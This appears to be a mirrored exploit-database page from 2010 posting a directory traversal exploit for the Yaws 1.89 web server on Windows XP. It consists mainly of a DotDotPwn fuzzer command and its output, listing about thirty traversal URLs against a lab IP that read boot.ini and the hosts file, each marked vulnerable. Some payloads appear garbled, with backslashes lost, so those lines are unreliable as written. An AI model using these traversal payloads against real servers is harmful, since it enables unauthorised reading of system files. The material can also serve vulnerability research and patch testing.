Home / os / win7

[remote exploits] - Yaws 1.89 Directory Traversal

Posted on 01 November 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Yaws 1.89 Directory Traversal | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Yaws 1.89 Directory Traversal by nitr0us in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=====================================
Yaws 1.89 Directory Traversal Exploit
=====================================

# Exploit Title: Yaws 1.89 Directory Traversal
# Date: 29 Oct
# Author: nitr0us (Alejandro Hernandez H.)
# Software Link: http://yaws.hyber.org/download/Yaws-1.89-windows-installer.exe
# Version: 1.89
# Tested on: Windows XP Service Pack 2
 
Chatsubo [(in)Security Dark] Labs
http://chatsubo-labs.blogspot.com
http://www.brainoverflow.org
 
EXPLOIT:
************************************************************************************
******* Released @ BugCon Security Conferences 2010 - http://www.bugcon.org ********
************************************************************************************
 
nitr0us@daiquiri ~ #./dotdotpwn.pl -m http -h 192.168.242.128 -O -s -d 3 -t 100 -q
#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______     ____ _/  |_\______     ____ _/  |_\______   \__  _  __ ____    #
#   |    |    /  _ \   __|    |    /  _ \   __|     ___/ / / //       #
#   |    `   (  &lt;_&gt; )|  |  |    `   (  &lt;_&gt; )|  |  |    |          /|   |    #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      /\_/ |___|  /  #
#          /                      /                                      /   #
#                               - DotDotPwn v2.1 -                              #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            dotdotpwn@sectester.net                            #
#                                                                               #
#                              by chr1x &amp; nitr0us                               #
#################################################################################
 
 
[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.242.128
[+] Detecting Operating System (nmap) ...
[+] Operating System detected:  Microsoft Windows XP SP2 or Windows Server 2003 SP0/SP1
[+] Protocol: http
[+] Port: 80
[+] Service detected:
Yaws/1.89 Yet Another Web Server
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 3 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (windows)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 2328
 
[=========== TESTING RESULTS ============]
[+] Ready to launch 10.00 traversals per second
[+] Press any key to start the testing (You can stop it pressing Ctrl + C)
 
[*] Testing Path: http://192.168.242.128:80/......oot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/......windowssystem32driversetchosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/..%5c..%5c..%5cboot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/%2e%2e\%2e%2e\%2e%2eoot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/%2e%2e\%2e%2e\%2e%2ewindowssystem32driversetchosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/..\..\..\boot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/..\..\..\windows\system32\drivers\etc\hosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/..\..\..\oot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/..\..\..\windows\system32\drivers\etc\hosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/../../../boot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/../../../windows/system32/drivers/etc/hosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/../../../oot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/../../../windows/system32/drivers/etc/hosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/../../../boot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/../../../windows/system32/drivers/etc/hosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80//../../..oot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80//../../..windows/system32/drivers/etc/hosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/.........oot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/.........windowssystem32driversetchosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/.\..\.\..\.\..\boot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/.\..\.\..\.\..\windows\system32\drivers\etc\hosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././......oot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././......windowssystem32driversetchosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80////......oot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80////......windows///system32///drivers///etc///hosts &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/\......oot.ini &lt;- VULNERABLE!
 
[*] Testing Path: http://192.168.242.128:80/\......windows\system32\drivers\etc\hosts &lt;- VULNERABLE!
 
[+] Fuzz testing finished after 10.68 minutes (641 seconds)
[+] Total Traversals found: 30


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-11-01]</pre></body></html>

 

TOP

Malware :

Exploits :